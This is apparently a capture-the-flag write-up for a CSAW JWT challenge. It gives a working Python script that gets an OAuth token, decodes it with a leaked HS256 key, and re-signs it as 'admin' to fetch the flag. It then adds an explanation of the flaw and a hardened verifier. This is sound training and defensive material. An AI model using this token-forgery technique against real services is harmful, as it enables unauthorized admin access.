Tags: jwt
Running this code will get you the flag.
```
import requests
import jwt  # PyJWT

BASE = "http://web.chal.csaw.io:9000"
REDIRECT = BASE + "/protected"

# Authorization request: the code is returned in the redirect target
code = requests.post(BASE + "/oauth2/authorize", headers={"Content-Type": "application/json"},
                     json={"response_type": "code", "redirect_uri": REDIRECT},
                     allow_redirects=False).text
code = code.split("protected?code=")[1].split("&")[0]

# Access token request
r = requests.post(BASE + "/oauth2/token",
                  json={"grant_type": "authorization_code", "code": code, "redirect_uri": REDIRECT}).text
token = r.split('"')[7]  # token value, taken by position from the JSON response text

# Modifying the token to type "admin" and re-signing it with the same HS256 secret
res = jwt.decode(token, 'ufoundme!', algorithms=['HS256'])
token = jwt.encode({'type': 'admin', 'secret': 'ufoundme!', 'iat': res['iat'], 'exp': res['exp']},
                   'ufoundme!', algorithm='HS256')
if isinstance(token, bytes):  # PyJWT < 2.0 returns bytes, 2.x returns str
    token = token.decode()

# Final request
req = requests.get(REDIRECT, headers={"Authorization": "Bearer " + token}).text
print(req)
```
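Why the re-signed token is accepted, seen from the issuer's side (an added example, not part of the original writeup or the challenge's code): a JWT payload is only base64url-encoded, so a signing key placed in a claim is readable by anyone holding the token. It assumes, as the `secret` claim in the script suggests, that the service's tokens carry the HS256 key; the key values, claim layout and helper names below are constructed for illustration.

```python
import base64, hashlib, hmac, json, secrets, time

def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64u_dec(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims: dict, key: bytes) -> str:
    header = b64u(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64u(json.dumps(claims).encode())
    mac = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64u(mac)}"

def read_claims_unverified(token: str) -> dict:
    # No key needed: this is what any token holder can read.
    return json.loads(b64u_dec(token.split(".")[1]))

def verify_hs256(token: str, key: bytes) -> dict:
    try:
        header, body, sig = token.split(".")
        if json.loads(b64u_dec(header)).get("alg") != "HS256":  # pin the algorithm
            raise ValueError("unexpected alg")
        want = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(want, b64u_dec(sig)):
            raise ValueError("bad signature")
        claims = json.loads(b64u_dec(body))
    except (ValueError, TypeError, AttributeError) as exc:
        raise PermissionError(f"token rejected: {exc}") from None
    if claims.get("exp", 0) < time.time():
        raise PermissionError("token expired")
    return claims

# Weak issuer (constructed): the signing key is copied into a claim.
WEAK_KEY = b"constructed-demo-key"
now = int(time.time())
weak_token = sign_hs256({"type": "user", "secret": WEAK_KEY.decode(),
                         "iat": now, "exp": now + 300}, WEAK_KEY)

# Hardened issuer: random 256-bit key kept server-side, no key material in claims.
STRONG_KEY = secrets.token_bytes(32)
good_token = sign_hs256({"type": "user", "iat": now, "exp": now + 300}, STRONG_KEY)

def hardened_accepts(token: str) -> bool:
    try:
        verify_hs256(token, STRONG_KEY)
        return True
    except PermissionError:
        return False
```
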